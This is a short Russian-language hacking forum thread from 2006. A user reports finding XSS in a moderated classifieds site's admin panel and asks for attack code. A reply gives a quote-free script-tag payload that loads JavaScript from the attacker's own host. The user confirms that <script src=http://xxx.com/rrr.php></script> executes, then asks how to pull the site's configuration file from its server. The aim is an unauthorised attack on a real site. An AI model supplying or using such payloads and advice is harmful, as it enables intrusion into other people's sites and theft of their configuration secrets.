Есть Xss в админке. дайте код

Discussion in 'PHP' started by Xover, 10 Jul 2006.

  1. Xover

    Xover New Member

    Joined:
    17 Sep 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Нашел Xss в админке(доска объявлений с премодерированием).

    Не проходят только символы " ' \

    Авторизация через сессии. Что можно сделать с помощью яваскрипта?

    Спс.
     
  2. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    Да. <script src=абсолютный_адрес_без_кавычек></script>
    Скрипт должен находиться где-то на твоем хосте
     
  3. Xover

    Xover New Member

    Joined:
    17 Sep 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо, будем пробовать


    <script src=http://xxx.com/rrr.php></script> - вот так нет реакции, там можно PHP подключать или только яваскрипт?

    ---------------
    упс, код выполняется, идем дальше.
     
    #3 Xover, 10 Jul 2006
    Last edited: 10 Jul 2006
  4. Xover

    Xover New Member

    Joined:
    17 Sep 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос:

    Как заставить код выполняться на их сервере а не на моем?

    Нужно выкачать конфигурационный файл, но скрипт выполняется у меня и ищет файл у меня на хосте.
     
    #4 Xover, 10 Jul 2006
    Last edited: 11 Jul 2006